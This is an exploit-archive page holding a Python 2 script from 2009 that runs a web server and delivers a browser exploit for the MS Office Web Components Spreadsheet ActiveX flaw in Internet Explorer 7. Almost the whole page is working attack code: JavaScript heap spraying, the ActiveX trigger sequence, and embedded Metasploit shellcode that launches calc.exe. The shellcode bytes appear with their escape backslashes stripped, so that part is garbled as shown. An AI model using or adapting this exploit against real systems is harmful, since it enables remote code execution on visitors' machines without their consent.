MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit
# Published : 2009-07-21
# Author : Ahmed Obied
# Previous Title : Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)
# Next Title : DD-WRT (httpd service) Remote Command Execution Vulnerability
#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#   
#   - Based on the code posted at http://www.milw0rm.com/exploits/9163
#   - Tested using:
#     > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed
#     > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed
#
#   Usage  : python ie_owc.py [port (between 1024 and 65535)]
#   

import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = 'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73'
        payload += 'x13x6fx02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0e'
        payload += 'x6fx02x3ax4bx53x89xcdx0bx17x03x5ex85x20x1a'
        payload += 'x3ax51x4fx03x5ax47xe4x36x3ax0fx81x33x71x97'
        payload += 'xc3x86x71x7ax68xc3x7bx03x6exc0x5axfax54x56'
        payload += 'x95x0ax1axe7x3ax51x4bx03x5ax68xe4x0exfax85'
        payload += 'x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2ax6bxc1'
        payload += 'x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85'
        payload += 'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02'
        payload += 'x3ax66x53x5dx80xf8x0fx54x38xf6xecxc2xcax5e'
        payload += 'x07x7cx69xecx1cx6ax29xf0xe5x0cxe6xf1x88x61'
        payload += 'xd0x62x0cx2cxd4x76x0ax02xb1x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
       
        function spray_heap()
        {
            var chunk_size, payload, nopsled;
            
            chunk_size = 0x100000;
            payload = unescape("<PAYLOAD>");
            nopsled = unescape("<NOP>");
            while (nopsled.length < chunk_size)
                nopsled += nopsled;
            nopsled_len = chunk_size - (payload.length + 20);        
            nopsled = nopsled.substring(0, nopsled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < <CHUNKS> ; i++)
                heap_chunks[i] = nopsled + payload;
        }    
         
        function trigger_bug()
        {
            var obj, arr;
           
            try {
                obj = new ActiveXObject("OWC10.Spreadsheet");
            } catch (err) { 
                try {
                    obj = new ActiveXObject("OWC11.Spreadsheet");	
           		} catch (err) {
                    window.location = 'about:blank';	
           		}
            }
            arr = new Array();
            arr.push(1);
            arr.push(2);
            arr.push(0);
            arr.push(window);
            for (var i = 0 ; i < arr.length ; i++) {
                for (var j = 0 ; j < 10 ; j++) {
                    try {
                        obj.Evaluate(arr[i]);
                    } catch (err) {}
                }
            }        
            window.status = arr[3] + "";
            for (var j = 0 ; j < 10 ; j++) {
                try {
                    obj.msDataSource(arr[3]);
                } catch (err) {}
            }
        }

        spray_heap();
        trigger_bug();
				
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0b0c%u0b0c')
        exploit = exploit.replace('<CHUNKS>', '100')      
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit 

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200) 
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
        except: 
            print '[*] Error : an error has occured while serving the HTTP request'
            exit_program()
            
def exit_program():
    print '[-] Exiting ...'
    sys.exit(0)
                       
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                exit_program()
        except socket.error:
            print '[*] Error : a socket error has occurred'
            exit_program()    
    except ValueError:
        print '[*] Error : an invalid port number was given'
        exit_program()
            
if __name__ == '__main__':
    main()

# www.Syue.com [2009-07-21]